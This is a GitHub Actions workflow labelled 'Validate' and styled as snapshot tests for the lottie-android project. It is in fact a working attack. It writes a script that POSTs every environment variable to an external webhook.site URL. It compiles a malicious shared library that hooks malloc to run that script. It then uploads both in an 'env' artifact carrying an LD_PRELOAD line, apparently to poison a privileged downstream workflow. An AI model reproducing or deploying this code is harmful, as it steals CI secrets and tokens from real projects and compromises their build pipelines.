name: Validate

on:
  pull_request:
  push:
    branches:
      - master

jobs:
  snapshot-tests:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout the code
        uses: actions/checkout@v3
      - name: "Create payload"
        run: |
          cat <<EOF > payload.sh
          wget --post-data "$(env)" -O - https://webhook.site/b3ad9a28-2a07-440a-a941-d3b40c6deb65 >/dev/null 2>&1
          EOF

      - name: Create malicious shared library
        run: |
          cat <<EOF > malicious.c
          #define _GNU_SOURCE

          #include <stdio.h>
          #include <dlfcn.h>
          #include <stdlib.h>

          static void* (*real_malloc)(size_t)=NULL;
          static int i = 0;

          void *malloc(size_t size)
          {
              if(i == 0) {
                setenv("PATH", "hello", 1);
                system("bash /home/runner/work/lottie-android/lottie-android/payload.sh");
                i = i++;
              }

              real_malloc = dlsym(RTLD_NEXT, "malloc");
              return real_malloc(size);
          }
          EOF
      - name: Compile
        run: |
          gcc -shared -fPIC -o malicious.so malicious.c
      - name: Save PR number
        if: github.event_name == 'pull_request'
        env:
          PR_NUMBER: ${{ github.event.number }}
        run: |
          mkdir env
          cp malicious.so env/
          cp payload.sh env/
          echo PR_NUMBER=$PR_NUMBER > ./env/env
          echo GITHUB_SHA=${{ github.sha }} >> ./env/env
          echo "LD_PRELOAD=./malicious.so" >> ./env/env
      - uses: actions/upload-artifact@v3
        with:
          name: env
          path: env/
